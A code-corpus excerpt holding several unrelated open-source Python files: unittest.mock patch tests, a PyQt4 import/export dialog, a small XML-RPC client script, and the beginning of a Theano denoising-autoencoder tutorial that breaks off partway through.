def test_new_callable_incompatible_with_new(self):
self.assertRaises(
ValueError, patch, foo_name, new=object(), new_callable=MagicMock
)
self.assertRaises(
ValueError, patch.object, Foo, 'f', new=object(),
new_callable=MagicMock
)
def test_new_callable_incompatible_with_autospec(self):
self.assertRaises(
ValueError, patch, foo_name, new_callable=MagicMock,
autospec=True
)
self.assertRaises(
ValueError, patch.object, Foo, 'f', new_callable=MagicMock,
autospec=True
)
def test_new_callable_inherit_for_mocks(self):
class MockSub(Mock):
pass
MockClasses = (
NonCallableMock, NonCallableMagicMock, MagicMock, Mock, MockSub
)
for Klass in MockClasses:
for arg in 'spec', 'spec_set':
kwargs = {arg: True}
p = patch(foo_name, new_callable=Klass, **kwargs)
m = p.start()
try:
instance = m.return_value
self.assertRaises(AttributeError, getattr, instance, 'x')
finally:
p.stop()
def test_new_callable_inherit_non_mock(self):
class NotAMock(object):
def __init__(self, spec):
self.spec = spec
p = patch(foo_name, new_callable=NotAMock, spec=True)
m = p.start()
try:
self.assertTrue(is_instance(m, NotAMock))
self.assertRaises(AttributeError, getattr, m, 'return_value')
finally:
p.stop()
self.assertEqual(m.spec, Foo)
def test_new_callable_class_decorating(self):
test = self
original = Foo
class SomeTest(object):
def _test(self, mock_foo):
test.assertIsNot(Foo, original)
test.assertIs(Foo, mock_foo)
test.assertIsInstance(Foo, SomeClass)
def test_two(self, mock_foo):
self._test(mock_foo)
def test_one(self, mock_foo):
self._test(mock_foo)
SomeTest = patch(foo_name, new_callable=SomeClass)(SomeTest)
SomeTest().test_one()
SomeTest().test_two()
self.assertIs(Foo, original)
def test_patch_multiple(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
patcher1 = patch.multiple(foo_name, f=1, g=2)
patcher2 = patch.multiple(Foo, f=1, g=2)
for patcher in patcher1, patcher2:
patcher.start()
try:
self.assertIs(Foo, original_foo)
self.assertEqual(Foo.f, 1)
self.assertEqual(Foo.g, 2)
finally:
patcher.stop()
self.assertIs(Foo, original_foo)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
@patch.multiple(foo_name, f=3, g=4)
def test():
self.assertIs(Foo, original_foo)
self.assertEqual(Foo.f, 3)
self.assertEqual(Foo.g, 4)
test()
def test_patch_multiple_no_kwargs(self):
self.assertRaises(ValueError, patch.multiple, foo_name)
self.assertRaises(ValueError, patch.multiple, Foo)
def test_patch_multiple_create_mocks(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
@patch.multiple(foo_name, f=DEFAULT, g=3, foo=DEFAULT)
def test(f, foo):
self.assertIs(Foo, original_foo)
self.assertIs(Foo.f, f)
self.assertEqual(Foo.g, 3)
self.assertIs(Foo.foo, foo)
self.assertTrue(is_instance(f, MagicMock))
self.assertTrue(is_instance(foo, MagicMock))
test()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_create_mocks_different_order(self):
# bug revealed by Jython!
original_f = Foo.f
original_g = Foo.g
patcher = patch.object(Foo, 'f', 3)
patcher.attribute_name = 'f'
other = patch.object(Foo, 'g', DEFAULT)
other.attribute_name = 'g'
patcher.additional_patchers = [other]
@patcher
def test(g):
self.assertIs(Foo.g, g)
self.assertEqual(Foo.f, 3)
test()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_stacked_decorators(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
@patch.multiple(foo_name, f=DEFAULT)
@patch.multiple(foo_name, foo=DEFAULT)
@patch(foo_name + '.g')
def test1(g, **kwargs):
_test(g, **kwargs)
@patch.multiple(foo_name, f=DEFAULT)
@patch(foo_name + '.g')
@patch.multiple(foo_name, foo=DEFAULT)
def test2(g, **kwargs):
_test(g, **kwargs)
@patch(foo_name + '.g')
@patch.multiple(foo_name, f=DEFAULT)
@patch.multiple(foo_name, foo=DEFAULT)
def test3(g, **kwargs):
_test(g, **kwargs)
def _test(g, **kwargs):
f = kwargs.pop('f')
foo = kwargs.pop('foo')
self.assertFalse(kwargs)
self.assertIs(Foo, original_foo)
self.assertIs(Foo.f, f)
self.assertIs(Foo.g, g)
self.assertIs(Foo.foo, foo)
self.assertTrue(is_instance(f, MagicMock))
self.assertTrue(is_instance(g, MagicMock))
self.assertTrue(is_instance(foo, MagicMock))
test1()
test2()
test3()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_create_mocks_patcher(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
patcher = patch.multiple(foo_name, f=DEFAULT, g=3, foo=DEFAULT)
result = patcher.start()
try:
f = result['f']
foo = result['foo']
self.assertEqual(set(result), set(['f', 'foo']))
self.assertIs(Foo, original_foo)
self.assertIs(Foo.f, f)
self.assertIs(Foo.foo, foo)
self.assertTrue(is_instance(f, MagicMock))
self.assertTrue(is_instance(foo, MagicMock))
finally:
patcher.stop()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_decorating_class(self):
test = self
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
class SomeTest(object):
def _test(self, f, foo):
test.assertIs(Foo, original_foo)
test.assertIs(Foo.f, f)
test.assertEqual(Foo.g, 3)
test.assertIs(Foo.foo, foo)
test.assertTrue(is_instance(f, MagicMock))
test.assertTrue(is_instance(foo, MagicMock))
def test_two(self, f, foo):
self._test(f, foo)
def test_one(self, f, foo):
self._test(f, foo)
SomeTest = patch.multiple(
foo_name, f=DEFAULT, g=3, foo=DEFAULT
)(SomeTest)
thing = SomeTest()
thing.test_one()
thing.test_two()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_create(self):
patcher = patch.multiple(Foo, blam='blam')
self.assertRaises(AttributeError, patcher.start)
patcher = patch.multiple(Foo, blam='blam', create=True)
patcher.start()
try:
self.assertEqual(Foo.blam, 'blam')
finally:
patcher.stop()
self.assertFalse(hasattr(Foo, 'blam'))
def test_patch_multiple_spec_set(self):
# if spec_set works then we can assume that spec and autospec also
# work as the underlying machinery is the same
patcher = patch.multiple(Foo, foo=DEFAULT, spec_set=['a', 'b'])
result = patcher.start()
try:
self.assertEqual(Foo.foo, result['foo'])
Foo.foo.a(1)
Foo.foo.b(2)
Foo.foo.a.assert_called_with(1)
Foo.foo.b.assert_called_with(2)
self.assertRaises(AttributeError, setattr, Foo.foo, 'c', None)
finally:
patcher.stop()
def test_patch_multiple_new_callable(self):
class Thing(object):
pass
patcher = patch.multiple(
Foo, f=DEFAULT, g=DEFAULT, new_callable=Thing
)
result = patcher.start()
try:
self.assertIs(Foo.f, result['f'])
self.assertIs(Foo.g, result['g'])
self.assertIsInstance(Foo.f, Thing)
self.assertIsInstance(Foo.g, Thing)
self.assertIsNot(Foo.f, Foo.g)
finally:
patcher.stop()
def test_nested_patch_failure(self):
original_f = Foo.f
original_g = Foo.g
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'missing', 1)
@patch.object(Foo, 'f', 1)
def thing1():
pass
@patch.object(Foo, 'missing', 1)
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
def thing2():
pass
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
@patch.object(Foo, 'missing', 1)
def thing3():
pass
for func in thing1, thing2, thing3:
self.assertRaises(AttributeError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_new_callable_failure(self):
original_f = Foo.f
original_g = Foo.g
original_foo = Foo.foo
def crasher():
raise NameError('crasher')
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'foo', new_callable=crasher)
@patch.object(Foo, 'f', 1)
def thing1():
pass
@patch.object(Foo, 'foo', new_callable=crasher)
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
def thing2():
pass
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
@patch.object(Foo, 'foo', new_callable=crasher)
def thing3():
pass
for func in thing1, thing2, thing3:
self.assertRaises(NameError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
self.assertEqual(Foo.foo, original_foo)
def test_patch_multiple_failure(self):
original_f = Foo.f
original_g = Foo.g
patcher = patch.object(Foo, 'f', 1)
patcher.attribute_name = 'f'
good = patch.object(Foo, 'g', 1)
good.attribute_name = 'g'
bad = patch.object(Foo, 'missing', 1)
bad.attribute_name = 'missing'
for additionals in [good, bad], [bad, good]:
patcher.additional_patchers = additionals
@patcher
def func():
pass
self.assertRaises(AttributeError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_new_callable_failure(self):
original_f = Foo.f
original_g = Foo.g
original_foo = Foo.foo
def crasher():
raise NameError('crasher')
patcher = patch.object(Foo, 'f', 1)
patcher.attribute_name = 'f'
good = patch.object(Foo, 'g', 1)
good.attribute_name = 'g'
bad = patch.object(Foo, 'foo', new_callable=crasher)
bad.attribute_name = 'foo'
for additionals in [good, bad], [bad, good]:
patcher.additional_patchers = additionals
@patcher
def func():
pass
self.assertRaises(NameError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
self.assertEqual(Foo.foo, original_foo)
def test_patch_multiple_string_subclasses(self):
Foo = type('Foo', (str,), {'fish': 'tasty'})
foo = Foo()
@patch.multiple(foo, fish='nearly gone')
def test():
self.assertEqual(foo.fish, 'nearly gone')
test()
self.assertEqual(foo.fish, 'tasty')
@patch('unittest.mock.patch.TEST_PREFIX', 'foo')
def test_patch_test_prefix(self):
class Foo(object):
thing = 'original'
def foo_one(self):
return self.thing
def foo_two(self):
return self.thing
def test_one(self):
return self.thing
def test_two(self):
return self.thing
Foo = patch.object(Foo, 'thing', 'changed')(Foo)
foo = Foo()
self.assertEqual(foo.foo_one(), 'changed')
self.assertEqual(foo.foo_two(), 'changed')
self.assertEqual(foo.test_one(), 'original')
self.assertEqual(foo.test_two(), 'original')
@patch('unittest.mock.patch.TEST_PREFIX', 'bar')
def test_patch_dict_test_prefix(self):
class Foo(object):
def bar_one(self):
return dict(the_dict)
def bar_two(self):
return dict(the_dict)
def test_one(self):
return dict(the_dict)
def test_two(self):
return dict(the_dict)
the_dict = {'key': 'original'}
Foo = patch.dict(the_dict, key='changed')(Foo)
foo =Foo()
self.assertEqual(foo.bar_one(), {'key': 'changed'})
self.assertEqual(foo.bar_two(), {'key': 'changed'})
self.assertEqual(foo.test_one(), {'key': 'original'})
self.assertEqual(foo.test_two(), {'key': 'original'})
def test_patch_with_spec_mock_repr(self):
for arg in ('spec', 'autospec', 'spec_set'):
p = patch('%s.SomeClass' % __name__, **{arg: True})
m = p.start()
try:
self.assertIn(" name='SomeClass'", repr(m))
self.assertIn(" name='SomeClass.class_attribute'",
repr(m.class_attribute))
self.assertIn(" name='SomeClass()'", repr(m()))
self.assertIn(" name='SomeClass().class_attribute'",
repr(m().class_attribute))
finally:
p.stop()
def test_patch_nested_autospec_repr(self):
with patch('unittest.test.testmock.support', autospec=True) as m:
self.assertIn(" name='support.SomeClass.wibble()'",
repr(m.SomeClass.wibble()))
self.assertIn(" name='support.SomeClass().wibble()'",
repr(m.SomeClass().wibble()))
def test_mock_calls_with_patch(self):
for arg in ('spec', 'autospec', 'spec_set'):
p = patch('%s.SomeClass' % __name__, **{arg: True})
m = p.start()
try:
m.wibble()
kalls = [call.wibble()]
self.assertEqual(m.mock_calls, kalls)
self.assertEqual(m.method_calls, kalls)
self.assertEqual(m.wibble.mock_calls, [call()])
result = m()
kalls.append(call())
self.assertEqual(m.mock_calls, kalls)
result.wibble()
kalls.append(call().wibble())
self.assertEqual(m.mock_calls, kalls)
self.assertEqual(result.mock_calls, [call.wibble()])
self.assertEqual(result.wibble.mock_calls, [call()])
self.assertEqual(result.method_calls, [call.wibble()])
finally:
p.stop()
def test_patch_imports_lazily(self):
p1 = patch('squizz.squozz')
self.assertRaises(ImportError, p1.start)
with uncache('squizz'):
squizz = Mock()
sys.modules['squizz'] = squizz
squizz.squozz = 6
p1 = patch('squizz.squozz')
squizz.squozz = 3
p1.start()
p1.stop()
self.assertEqual(squizz.squozz, 3)
def test_patch_propogrates_exc_on_exit(self):
class holder:
exc_info = None, None, None
class custom_patch(_patch):
def __exit__(self, etype=None, val=None, tb=None):
_patch.__exit__(self, etype, val, tb)
holder.exc_info = etype, val, tb
stop = __exit__
def with_custom_patch(target):
getter, attribute = _get_target(target)
return custom_patch(
getter, attribute, DEFAULT, None, False, None,
None, None, {}
)
@with_custom_patch('squizz.squozz')
def test(mock):
raise RuntimeError
with uncache('squizz'):
squizz = Mock()
sys.modules['squizz'] = squizz
self.assertRaises(RuntimeError, test)
self.assertIs(holder.exc_info[0], RuntimeError)
self.assertIsNotNone(holder.exc_info[1],
'exception value not propgated')
self.assertIsNotNone(holder.exc_info[2],
'exception traceback not propgated')
def test_create_and_specs(self):
for kwarg in ('spec', 'spec_set', 'autospec'):
p = patch('%s.doesnotexist' % __name__, create=True,
**{kwarg: True})
self.assertRaises(TypeError, p.start)
self.assertRaises(NameError, lambda: doesnotexist)
# check that spec with create is innocuous if the original exists
p = patch(MODNAME, create=True, **{kwarg: True})
p.start()
p.stop()
def test_multiple_specs(self):
original = PTModule
for kwarg in ('spec', 'spec_set'):
p = patch(MODNAME, autospec=0, **{kwarg: 0})
self.assertRaises(TypeError, p.start)
self.assertIs(PTModule, original)
for kwarg in ('spec', 'autospec'):
p = patch(MODNAME, spec_set=0, **{kwarg: 0})
self.assertRaises(TypeError, p.start)
self.assertIs(PTModule, original)
for kwarg in ('spec_set', 'autospec'):
p = patch(MODNAME, spec=0, **{kwarg: 0})
self.assertRaises(TypeError, p.start)
self.assertIs(PTModule, original)
def test_specs_false_instead_of_none(self):
p = patch(MODNAME, spec=False, spec_set=False, autospec=False)
mock = p.start()
try:
# no spec should have been set, so attribute access should not fail
mock.does_not_exist
mock.does_not_exist = 3
finally:
p.stop()
def test_falsey_spec(self):
for kwarg in ('spec', 'autospec', 'spec_set'):
p = patch(MODNAME, **{kwarg: 0})
m = p.start()
try:
self.assertRaises(AttributeError, getattr, m, 'doesnotexit')
finally:
p.stop()
def test_spec_set_true(self):
for kwarg in ('spec', 'autospec'):
p = patch(MODNAME, spec_set=True, **{kwarg: True})
m = p.start()
try:
self.assertRaises(AttributeError, setattr, m,
'doesnotexist', 'something')
self.assertRaises(AttributeError, getattr, m, 'doesnotexist')
finally:
p.stop()
def test_callable_spec_as_list(self):
spec = ('__call__',)
p = patch(MODNAME, spec=spec)
m = p.start()
try:
self.assertTrue(callable(m))
finally:
p.stop()
def test_not_callable_spec_as_list(self):
spec = ('foo', 'bar')
p = patch(MODNAME, spec=spec)
m = p.start()
try:
self.assertFalse(callable(m))
finally:
p.stop()
def test_patch_stopall(self):
unlink = os.unlink
chdir = os.chdir
path = os.path
patch('os.unlink', something).start()
patch('os.chdir', something_else).start()
@patch('os.path')
def patched(mock_path):
patch.stopall()
self.assertIs(os.path, mock_path)
self.assertIs(os.unlink, unlink)
self.assertIs(os.chdir, chdir)
patched()
self.assertIs(os.path, path)
def test_stopall_lifo(self):
stopped = []
class thing(object):
one = two = three = None
def get_patch(attribute):
class mypatch(_patch):
def stop(self):
stopped.append(attribute)
return super(mypatch, self).stop()
return mypatch(lambda: thing, attribute, None, None,
False, None, None, None, {})
[get_patch(val).start() for val in ("one", "two", "three")]
patch.stopall()
self.assertEqual(stopped, ["three", "two", "one"])
def test_special_attrs(self):
def foo(x=0):
"""TEST"""
return x
with patch.object(foo, '__defaults__', (1, )):
self.assertEqual(foo(), 1)
self.assertEqual(foo(), 0)
with patch.object(foo, '__doc__', "FUN"):
self.assertEqual(foo.__doc__, "FUN")
self.assertEqual(foo.__doc__, "TEST")
with patch.object(foo, '__module__', "testpatch2"):
self.assertEqual(foo.__module__, "testpatch2")
self.assertEqual(foo.__module__, 'unittest.test.testmock.testpatch')
with patch.object(foo, '__annotations__', dict([('s', 1, )])):
self.assertEqual(foo.__annotations__, dict([('s', 1, )]))
self.assertEqual(foo.__annotations__, dict())
def foo(*a, x=0):
return x
with patch.object(foo, '__kwdefaults__', dict([('x', 1, )])):
self.assertEqual(foo(), 1)
self.assertEqual(foo(), 0)
if __name__ == '__main__':
unittest.main()
| FFMG/myoddweb.piger | monitor/api/python/Python-3.7.2/Lib/unittest/test/testmock/testpatch.py | Python | gpl-2.0 | 55,727 |
# -* coding: utf-8 *-
from PyQt4 import QtGui
from collector.ui.gen.im_export import Ui_Dialog
from collector.ui.views import Dialog
from collector.ui.helpers.customtoolbar import CustomToolbar
from collector.core.controller import get_manager
from collector.core.plugin import PluginExporter, PluginImporter
import logging
class BaseDialog(QtGui.QDialog, Ui_Dialog):
"""
BaseDialog
----------
Common parts for ImportDialog and ExportDialog
"""
def __init__(self, parent=None):
super(BaseDialog, self).__init__(parent)
self.setupUi(self)
self.customize()
def customize(self):
self.label_noplugins.hide()
plugins = self.get_plugins()
man = get_manager('plugin')
items = []
for i in plugins:
plugin = man.get(i)
items.append(
{'class': 'link', 'name': plugin.get_name(),
'path': 'plugin/' + plugin.get_id(),
'image': plugin.icon}
)
# Toolbar
items.append({'class': 'spacer'})
CustomToolbar(self.toolbar, items, self.select_plugin)
if not len(plugins):
self.toolbar.hide()
self.label_noplugins.show()
def select_plugin(self, uri):
"""Select plugin callback"""
params = self.parent().collector_uri_call(uri)
if params is not None:
plugin = params.get('plugin', None)
if plugin is not None:
man = get_manager('plugin')
self.hide()
try:
man.get(plugin).run()
self.done(1)
except Exception as exc:
logging.exception(exc)
self.done(-1)
def get_plugins(self):
plugins = get_manager('plugin').filter(self.filter_)
return plugins
class ExportDialog(BaseDialog):
"""
ExportDialog
------------
"""
# TODO
filter_ = PluginExporter
def customize(self):
super(ExportDialog, self).customize()
self.setWindowTitle(self.tr("Export"))
class ImportDialog(BaseDialog):
"""
ImportDialog
------------
"""
filter_ = PluginImporter
def customize(self):
super(ImportDialog, self).customize()
self.setWindowTitle(self.tr("Import"))
class ImportView(Dialog):
"""Properties view"""
def get_widget(self, params):
return ImportDialog(self.parent)
class ExportView(Dialog):
"""Properties view"""
def get_widget(self, params):
return ExportDialog(self.parent)
| arielvb/collector | collector/ui/views/im_export.py | Python | gpl-2.0 | 2,612 |
#!/usr/bin/python
import xmlrpc.client
from time import sleep
def remoteCall(func, *args):
try:
ret = func(*args)
return ret
except xmlrpc.client.Fault as e:
print(e)
server = xmlrpc.client.ServerProxy("https://localhost:8080", allow_none=True)
sid = remoteCall(server.login, "dj", "abc123")
print(remoteCall(server.getfoo, sid))
sleep(3)
print(remoteCall(server.getfoo, sid))
sleep(6)
print(remoteCall(server.getfoo, sid))
| bitbyt3r/musicserver | start.py | Python | gpl-2.0 | 459 |
"""
This tutorial introduces denoising auto-encoders (dA) using Theano.
Denoising autoencoders are the building blocks for SdA.
They are based on auto-encoders as the ones used in Bengio et al. 2007.
An autoencoder takes an input x and first maps it to a hidden representation
y = f_{\theta}(x) = s(Wx+b), parameterized by \theta={W,b}. The resulting
latent representation y is then mapped back to a "reconstructed" vector
z \in [0,1]^d in input space z = g_{\theta'}(y) = s(W'y + b'). The weight
matrix W' can optionally be constrained such that W' = W^T, in which case
the autoencoder is said to have tied weights. The network is trained such
that to minimize the reconstruction error (the error between x and z).
For the denosing autoencoder, during training, first x is corrupted into
\tilde{x}, where \tilde{x} is a partially destroyed version of x by means
of a stochastic mapping. Afterwards y is computed as before (using
\tilde{x}), y = s(W\tilde{x} + b) and z as s(W'y + b'). The reconstruction
error is now measured between z and the uncorrupted input x, which is
computed as the cross-entropy :
- \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)]
References :
- P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and
Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103,
2008
- Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise
Training of Deep Networks, Advances in Neural Information Processing
Systems 19, 2007
"""
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
from logistic_sgd import load_data
from utils import tile_raster_images, load_vc
try:
import PIL.Image as Image
except ImportError:
import Image
try:
from matplotlib import pyplot as pp
except ImportError:
print 'matplotlib is could not be imported'
# start-snippet-1
class dA_joint(object):
"""Denoising Auto-Encoder class (dA)
A denoising autoencoders tries to reconstruct the input from a corrupted
version of it by projecting it first in a latent space and reprojecting
it afterwards back in the input space. Please refer to Vincent et al.,2008
for more details. If x is the input then equation (1) computes a partially
destroyed version of x by means of a stochastic mapping q_D. Equation (2)
computes the projection of the input into the latent space. Equation (3)
computes the reconstruction of the input, while equation (4) computes the
reconstruction error.
.. math::
\tilde{x} ~ q_D(\tilde{x}|x) (1)
y = s(W \tilde{x} + b) (2)
x = s(W' y + b') (3)
L(x,z) = -sum_{k=1}^d [x_k \log z_k + (1-x_k) \log( 1-z_k)] (4)
"""
def __init__(
self,
numpy_rng,
theano_rng=None,
input1=None,
input2=None,
cor_reg=None,
n_visible1=784/2,
n_visible2=784/2,
n_hidden=500,
W1=None,
bhid1=None,
bvis1=None,
W2=None,
bhid2=None,
bvis2=None
):
"""
Initialize the dA class by specifying the number of visible units (the
dimension d of the input ), the number of hidden units ( the dimension
d' of the latent or hidden space ) and the corruption level. The
constructor also receives symbolic variables for the input, weights and
bias. Such a symbolic variables are useful when, for example the input
is the result of some computations, or when weights are shared between
the dA and an MLP layer. When dealing with SdAs this always happens,
the dA on layer 2 gets as input the output of the dA on layer 1,
and the weights of the dA are used in the second stage of training
to construct an MLP.
:type numpy_rng: numpy.random.RandomState
:param numpy_rng: number random generator used to generate weights
:type theano_rng: theano.tensor.shared_randomstreams.RandomStreams
:param theano_rng: Theano random generator; if None is given one is
generated based on a seed drawn from `rng`
:type input: theano.tensor.TensorType
:param input: a symbolic description of the input or None for
standalone dA
:type n_visible: int
:param n_visible: number of visible units
:type n_hidden: int
:param n_hidden: number of hidden units
:type W: theano.tensor.TensorType
:param W: Theano variable pointing to a set of weights that should be
shared belong the dA and another architecture; if dA should
be standalone set this to None
:type bhid: theano.tensor.TensorType
:param bhid: Theano variable pointing to a set of biases values (for
hidden units) that should be shared belong dA and another
architecture; if dA should be standalone set this to None
:type bvis: theano.tensor.TensorType
:param bvis: Theano variable pointing to a set of biases values (for
visible units) that should be shared belong dA and another
architecture; if dA should be standalone set this to None
"""
self.n_visible1 = n_visible1
self.n_visible2 = n_visible2
self.n_hidden = n_hidden
# create a Theano random generator that gives symbolic random values
if not theano_rng:
theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))
# note : W' was written as `W_prime` and b' as `b_prime`
if not W1:
# W is initialized with `initial_W` which is uniformely sampled
# from -4*sqrt(6./(n_visible+n_hidden)) and
# 4*sqrt(6./(n_hidden+n_visible))the output of uniform if
# converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
initial_W1 = numpy.asarray(
numpy_rng.uniform(
low=-4 * numpy.sqrt(6. / (n_hidden + n_visible1)),
high=4 * numpy.sqrt(6. / (n_hidden + n_visible1)),
size=(n_visible1, n_hidden)
),
dtype=theano.config.floatX
)
W1 = theano.shared(value=initial_W1, name='W1', borrow=True)
if not W2:
# W is initialized with `initial_W` which is uniformely sampled
# from -4*sqrt(6./(n_visible+n_hidden)) and
# 4*sqrt(6./(n_hidden+n_visible))the output of uniform if
# converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
initial_W2 = numpy.asarray(
numpy_rng.uniform(
low=-4 * numpy.sqrt(6. / (n_hidden + n_visible2)),
high=4 * numpy.sqrt(6. / (n_hidden + n_visible2)),
size=(n_visible2, n_hidden)
),
dtype=theano.config.floatX
)
W2 = theano.shared(value=initial_W2, name='W2', borrow=True)
if not bvis1:
bvis1 = theano.shared(
value=numpy.zeros(
n_visible1,
dtype=theano.config.floatX
),
name='b1p',
borrow=True
)
if not bvis2:
bvis2 = theano.shared(
value=numpy.zeros(
n_visible2,
dtype=theano.config.floatX
),
name='b2p',
borrow=True
)
if not bhid1:
bhid1 = theano.shared(
value=numpy.zeros(
n_hidden,
dtype=theano.config.floatX
),
name='b1',
borrow=True
)
if not bhid2:
bhid2 = theano.shared(
value=numpy.zeros(
n_hidden,
dtype=theano.config.floatX
),
name='b2',
borrow=True
)
self.W1 = W1
self.W2 = W2
# b corresponds to the bias of the hidden
self.b1 = bhid1
self.b2 = bhid2
# b_prime corresponds to the bias of the visible
self.b1_prime = bvis1
self.b2_prime = bvis2
# tied weights, therefore W_prime is W transpose
self.W1_prime = self.W1.T
self.W2_prime = self.W2.T
self.theano_rng = theano_rng
self.L1 = (
abs(self.W1).sum()+abs(self.W2).sum()#+abs(self.b1).sum()+abs(self.b2).sum()+abs(self.b1_prime).sum()+abs(self.b2_prime).sum()
)
self.L2_sqr = (
(self.W1**2).sum()#+(self.W2**2).sum()#+abs(self.b1**2).sum()+abs(self.b2**2).sum()+abs(self.b1_prime**2).sum()+abs(self.b2_prime**2).sum()
)
# if no input is given, generate a variable representing the input
if input1 is None:
# we use a matrix because we expect a minibatch of several
# examples, each example being a row
self.x1 = T.dmatrix(name='input1')
self.x2 = T.dmatrix(name='input2')
else:
self.x1 = input1
self.x2 = input2
self.params = [self.W1, self.b1, self.b1_prime,
self.W2, self.b2, self.b2_prime
]
# end-snippet-1
self.output1 = T.tanh(T.dot(self.x1, self.W1) + self.b1)
self.output2 = T.tanh(T.dot(self.x2, self.W2) + self.b2)
self.rec1 = T.tanh(T.dot(self.output1, self.W1_prime) + self.b1_prime)
self.rec2 = T.tanh(T.dot(self.output2, self.W2_prime) + self.b2_prime)
self.reg = T.tanh(T.dot(self.output1, self.W2_prime) + self.b2_prime)
self.cor_reg = theano.shared(numpy.float32(1.0),name='reg')
def get_corrupted_input(self, input1, input2, corruption_level):
"""This function keeps ``1-corruption_level`` entries of the inputs the
same and zero-out randomly selected subset of size ``coruption_level``
Note : first argument of theano.rng.binomial is the shape(size) of
random numbers that it should produce
second argument is the number of trials
third argument is the probability of success of any trial
this will produce an array of 0s and 1s where 1 has a
probability of 1 - ``corruption_level`` and 0 with
``corruption_level``
The binomial function return int64 data type by
default. int64 multiplicated by the input
type(floatX) always return float64. To keep all data
in floatX when floatX is float32, we set the dtype of
the binomial to floatX. As in our case the value of
the binomial is always 0 or 1, this don't change the
result. This is needed to allow the gpu to work
correctly as it only support float32 for now.
"""
a=self.theano_rng.binomial(size=input1.shape, n=1,
p=1 - corruption_level,
dtype=theano.config.floatX) * input1
b=self.theano_rng.binomial(size=input2.shape, n=1,
p=1 - corruption_level,
dtype=theano.config.floatX) * input2
return a,b
def get_hidden_values(self, input1, input2):
""" Computes the values of the hidden layer """
return T.tanh(T.dot(input1, self.W1) + self.b1), T.tanh(T.dot(input2, self.W2) + self.b2)
def get_reconstructed_input(self, hidden1, hidden2):
"""Computes the reconstructed input given the values of the
hidden layer
"""
a = T.tanh(T.dot(hidden1, self.W1_prime) + self.b1_prime)
b = T.tanh(T.dot(hidden2, self.W2_prime) + self.b2_prime)
return a, b
def get_cost_updates(self, corruption_level, learning_rate):
""" This function computes the cost and the updates for one trainng
step of the dA """
tilde_x1, tilde_x2 = self.get_corrupted_input(self.x1, self.x2, corruption_level)
y1, y2 = self.get_hidden_values(tilde_x1, tilde_x2)
z1, z2 = self.get_reconstructed_input(y1, y2)
# note : we sum over the size of a datapoint; if we are using
# minibatches, L will be a vector, with one entry per
# example in minibatch
L_x1 = - T.sum(self.x1 * T.log(z1) + (1 - self.x1) * T.log(1 - z1), axis=1)
L_x2 = - T.sum(self.x2 * T.log(z2) + (1 - self.x2) * T.log(1 - z2), axis=1)
L_X1_x2 = - T.sum(y1 * T.log(y2) + (1 - y1) * T.log(1 - y2), axis=1)
L_X2_x1 = - T.sum(y2 * T.log(y1) + (1 - y2) * T.log(1 - y1), axis=1)
#L_X1_x2 = T.mean(T.mean((y1-y2)**2,1))
L_x1 = T.mean((z1-self.x1)**2) #+ (1 - self.x1) * T.log(1 - z1), axis=1)
L_x2 = T.mean((z2-self.x2)**2)
L_X1_x2 = T.mean((y1-y2)**2)
##cost = T.mean(L_x1) + T.mean(L_x2) + self.cor_reg*T.mean(L_X1_x2)+0.001*self.L1+001*self.L2_sqr# + 0.2*T.mean(L_X2_x1)
cost = T.mean(L_x1) + T.mean(L_x2) #+ T.mean(L_X1_x2) #+ .001*self.L2_sqr# + 0.2*T.mean(L_X2_x1)
# compute the gradients of the cost of the `dA` with respect
# to its parameters
gparams = T.grad(cost, self.params)
# generate the list of updates
updates = [
(param, param - learning_rate * gparam)
for param, gparam in zip(self.params, gparams)
]
return (cost, updates)
def test_dA(learning_rate=0.01, training_epochs=15000,
dataset='mnist.pkl.gz',
batch_size=5, output_folder='dA_plots'):
"""
This demo is tested on MNIST
:type learning_rate: float
:param learning_rate: learning rate used for training the DeNosing
AutoEncoder
:type training_epochs: int
:param training_epochs: number of epochs used for training
:type dataset: string
:param dataset: path to the picked dataset
"""
##datasets = load_data(dataset)
#from SdA_mapping import load_data_half
#datasets = load_data_half(dataset)
print 'loading data'
datasets, x_mean, y_mean, x_std, y_std = load_vc()
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
print 'loaded data'
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
x1 = T.matrix('x1') # the data is presented as rasterized images
x2 = T.matrix('x2') # the data is presented as rasterized images
cor_reg = T.scalar('cor_reg')
if not os.path.isdir(output_folder):
os.makedirs(output_folder)
os.chdir(output_folder)
####################################
